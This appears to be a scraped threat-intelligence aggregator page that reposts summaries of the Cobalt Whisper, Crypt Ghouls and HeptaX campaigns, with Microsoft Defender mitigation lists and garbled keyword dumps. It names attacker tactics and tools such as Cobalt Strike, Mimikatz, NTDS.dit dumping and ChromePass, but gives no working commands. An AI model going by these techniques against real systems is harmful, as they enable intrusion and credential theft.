One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8601746 |
| Date de publication | 2024-10-25 17:22:14 (vue: 2024-10-25 18:07:27) |
| Titre | Opération Cobalt Whisper: l'acteur de menace cible plusieurs industries à travers Hong Kong et le Pakistan Operation Cobalt Whisper: Threat Actor Targets Multiple Industries Across Hong Kong and Pakistan (Recyclage) |
| Texte | #### Targeted Geolocations - Pakistan - China #### Targeted Industries - Defense Industrial Base - Education - Higher Education - Energy - Information Technology - Healthcare & Public Health ## Snapshot SEQRITE Labs\' APT team has exposed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries in Hong Kong and Pakistan. ## Description This operation extensively uses the Cobalt Strike post-exploitation tool, delivered via obfuscated VBScript in infected archives. SEQRITE identified over 20 infection chains, primarily affecting organizations in Hong Kong but also Pakistan, with decoy documents in RAR archives containing both PDF and LNK files. Industries impacted by the campaign include defense, education, enviornmental engineering, energy, cybersecurity, aviation, and healthcare. Technical analysis reveals a two-stage infection process, where an initial LNK executes a VBScript to achieve persistence and hide activity, followed by a Cobalt Strike beacon disguised as a legitimate executable that connects back to the attacker. SEQRITE\'s investigations found commonalities in naming conventions, particularly using the filename “ImeBroker.exe,” to deploy Cobalt Strike implants across multiple activity clusters. Through file path artifacts, machine IDs, and configuration similarities, SEQRITE linked clusters of activity to Operation Cobalt Whisperer, including those aimed at the Pakistani defense sector and electrotechnical researchers. These campaigns reveal sophisticated tactics designed to exploit high-value information from specific industry sectors across Asia, with consistent command-and-control patterns registered with Tencent\'s network infrastructure. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection. - Microsoft |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed achieve across action activity actor advanced af74 affecting against age aimed alert alerts all allow also analysis antivirus any apt archives are artifacts asia attack attacker authority automated aviation back base based beacon behind block both breach breaches but campaign campaigns can chains changes china client cloud clusters cobalt com/blog/operation com/en com/microsoft com/threatanalytics3/9382203e command common commonalities components configuration configure connects consistent containing content control controlled conventions copyright cover credential criterion customers cyber cybersecurity decoy defend defender defense delivered deploy description designed detect detected detections/hunting detects dha disguised distribution documents does edr education electrotechnical email enable enabled encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy engineering ensure enviornmental equivalent espionage even evolving exe executable executes exploit exploitation exposed extensively file filename files folder folders follow followed following found from full geolocations gpb hardening has health healthcare hide high higher hong https://learn https://security https://www identified ids immediate impact impacted impacting implants include including industrial industries industry infected infection information infrastructure initial investigation investigations known kong labs learndoc learning legitimate like linked list lnk local lsa lsass machine majority malicious malware: manage meet microsoft mitigations mode mtb multiple name=trojan:msil/agenttesla name=trojan:msil/znyonm name=trojan:win32/casdet name=trojan:win32/cobalstrike name=trojan:win32/leonem name=trojan:win32/lnkrunner name=trojan:win64/turtleloader naming network new non not obfuscated ocid=magicti operation organizations over overview pakistan pakistan/ pakistani part particularly passive path patterns pdf permission persistence post preferences premises prevalence prevent primarily process product prohibited protection protection#how protections public queries ransomware rapidly rar recommendations recommends reduce reducing reduction reference#block references registered remediate remediation reproduction researchers reserved resolve reveal reveals rfn rights rule rules run running scenes sector sectors security seqrite settings significantly similarities site snapshot sophisticated specific stage stealing strike subsystem surface tactics take tamper targeted targets team technical techniques technology tencent theft thereof these those threat threats through tool tools trojan:msil/agenttesla trojan:win32/casdet trojan:win32/cobalstrike trojan:win32/leonem trojan:win32/lnkrunner trojan:win32/znyonm trojan:win64/turtleloader trusted turn two unknown unless us/defender us/wdsi/threats/malware used uses using value vbscript view=o365 volume webmail when where whisper whisper: whisperer windows without works worldwide written xdr your “imebroker |
| Tags | Ransomware Malware Tool Threat Industrial Medical |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8601196 |
| Date de publication | 2024-10-21 20:43:52 (vue: 2024-10-21 21:12:46) |
| Titre | Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia |
| Texte | ## Snapshot Kaspersky researchers identified a new threat group known as "Crypt Ghouls," which has been targeting Russian businesses and government agencies across various sectors, including mining, energy, finance, and retail. ## Description The group has been deploying ransomware such as LockBit 3.0 and Babuk, and their toolkit includes utilities like Mimikatz, XenAllPasswordPro, AnyDesk, and others. Initial access was often achieved using a contractor\'s login credentials to connect to the victim\'s internal systems via VPN, with subsequent maintenance of access through utilities like NSSM and Localtonet. The Crypt Ghouls have demonstrated a range of techniques for credential harvesting, domain controller access, network reconnaissance, and lateral movement. They have used tools like the MiniDump Tool to extract credentials from memory, copied browser-stored credentials, and employed PowerShell scripts for reconnaissance. For domain controller access, they connected via WMI, modified scheduler tasks, and dumped NTDS.dit. Network navigation was facilitated by tools such as PingCastle, SoftPerfect Network Scanner, WmiExec.py Impacket module, and PAExec. They also engaged in DLL sideloading using a legitimate Windows installer management application and a malicious loader. The group\'s ransomware attacks have been sophisticated, with LockBit 3.0 configured to encrypt specific files and directories, disable Windows Defender, and delete event logs, while Babuk targeted virtual machines on ESXi servers. Crypt Ghouls left ransom notes with contact links via the Session messaging service and used IP addresses from a Surfshark VPN subnet and hosting provider VDSina\'s network for remote connections. Their activities have shown similarities with other groups such as MorLock, BlackJack, Twelve, and Shedding Zmiy, indicating potential collaboration or resource sharing among these threat actors. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-ref |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed achieved across action activities actors addresses af74 against age agencies alert alerts all allow also among analysis analysis/114217/ antivirus any anydesk application are artifacts attack attacker attacks authority automated babuk based been behind blackjack block breach breaches browser businesses can changes client cloud collaboration com/crypt com/en com/microsoft com/threatanalytics3/9382203e common configure configured connect connected connections contact content continuing contractor controlled controller copied copyright cover credential credentials criterion crypt customers defend defender delete delivered demonstrated deploying description detect detected directories disable distribution dit dll does domain dumped edr email employed enable enabled encrypt endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy engaged ensure equivalent esxi even event evolving executable extract facilitated files finance folder folders follow following from full ghouls government group group: groups hacktivists hardening harvesting has have hosting https://learn https://securelist https://security identified immediate impacket impact includes including indicating initial installer internal investigation investigations kaspersky known lateral learndoc learning left legitimate like links list loader local localtonet lockbit login logs lsa lsass machine machines maintenance majority malicious manage management meet memory messaging microsoft mimikatz minidump mining mitigations mode modified module morlock movement navigation network new non not notes nssm ntds ocid=magicti often other others overlap overview paexec part passive permission pingcastle post potential powershell preferences premises prevalence prevent product prohibited protection protection#how protections provider range ransom ransomware rapidly recommendations recommends reconnaissance reduce reducing reduction reference#block references remediate remediation remote reproduction researchers reserved resolve resource retail rights rule rules run running russia russian scanner scenes scheduler scripts sectors security series servers service session settings sharing shedding shown sideloading significantly similarities site snapshot softperfect sophisticated specific stealing stored subnet subsequent subsystem such surface surfshark systems take tamper targeted targeting tasks techniques theft thereof these threat threats through tool toolkit tools trusted turn twelve unknown unless us/defender used using utilities various vdsina victim view=o365 virtual volume vpn webmail when which windows without wmi wmiexec works worldwide written xdr xenallpasswordpro your zmiy network |
| Tags | Ransomware Tool Threat |
| Stories | |
| Move |
|
L'article ressemble à 1 autre(s) article(s):
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
|
2024-10-25 19:15:07 | (Déjà vu) HEPTAX: Connexions RDP non autorisées pour les opérations de cyberespionnage HeptaX: Unauthorized RDP Connections for Cyberespionage Operations (lien direct) |
#### Industries ciblées - Santé et santé publique ## Instantané Cyble Research and Intelligence Labs (CRIL) a identifié une campagne de cyberattaque active, surnommée "Heptax", à l'aide de fichiers de raccourci malveillants (fichiers LNK) dans une chaîne d'attaque complexe et multi-étages.La campagne n'a pas été attribuée à un acteur de menace connu. ## Description L'attaque commence par un fichier zip contenant le fichier LNK malveillant, probablement distribué par phishing.Sur la base du titre du fichier LNK, Cril évalue les organisations de guérison des cibles Heptax.Lors de l'exécution, ce fichier LNK lance des commandes PowerShell qui téléchargent d'autres scripts PowerShell et fichiers BAT sur l'appareil de la victime \\, permettant aux attaquants de créer un compte administratif et d'ajuster les paramètres de bureau distant (RDP).Cet accès simplifie les sessions RDP non autorisées pour l'exploitation continue. La campagne utilise des outils supplémentaires, comme Chromepass, pour extraire les mots de passe enregistrés des navigateurs à base de chrome, mettant les comptes des victimes \\ 'à plus davantage.Les campagnes répétées de Heptax \\ au cours de la dernière année indiquent qu'il a réussi à tirer parti des mêmes tactiques de base malgré sa visibilité. Les scripts rassemblent également et renvoient systématiquement les informations système détaillées au serveur de commande et de contrôle, ce qui rend ces infections à la fois furtives et polyvalentes.En abaissant les commandes de sécurité, en désactivant le contrôle des comptes d'utilisateurs (UAC) et en obtenant des privilèges administratifs, les attaquants peuvent installer d'autres logiciels malveillants, exfilter les données et surveiller l'activité du système non détectée.La campagne met en évidence la nécessité d'une amélioration des capacités de détection contre les attaques basées sur des scripts, qui ont permis à ce groupe de rester largement inaperçu malgré son activité prolongée et ses techniques récurrentes. ## Analyse Microsoft et contexte OSINT supplémentaire ChromePass est un outil de récupération de mot de passe conçu pour récupérer et afficher les informations d'identification de connexion enregistrées stockées dans des navigateurs à base de chrome, tels que Chrome, Brave et Edge.Bien qu'il ait des utilisations légitimes pour la récupération de mot de passe, les acteurs malveillants exploitent ChromePass pour extraire secrètement les noms d'utilisateur et les mots de passe des appareils victimes de victimes.Une fois déployé sur un système compromis, ChromePass peut rapidement localiser et décrypter les mots de passe, qui sont souvent stockés dans la base de données cryptée d'un navigateur à des fins automatique.En exfiltrant ces informations d'identification, les attaquants obtiennent un accès non autorisé aux comptes sensibles des utilisateurs, y compris les e-mails, les services financiers et les systèmes d'entreprise.Ces données peuvent ensuite être exploitées pour d'autres activités malveillantes, telles que la farce des informations d'identification, le vol d'identité et le phishing de lance, permettant aux cybercriminels d'étendre leur portée et de compromettre des systèmes supplémentaires liés aux comptes de la victime. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/ed | Malware Tool Threat Medical | ★★★ |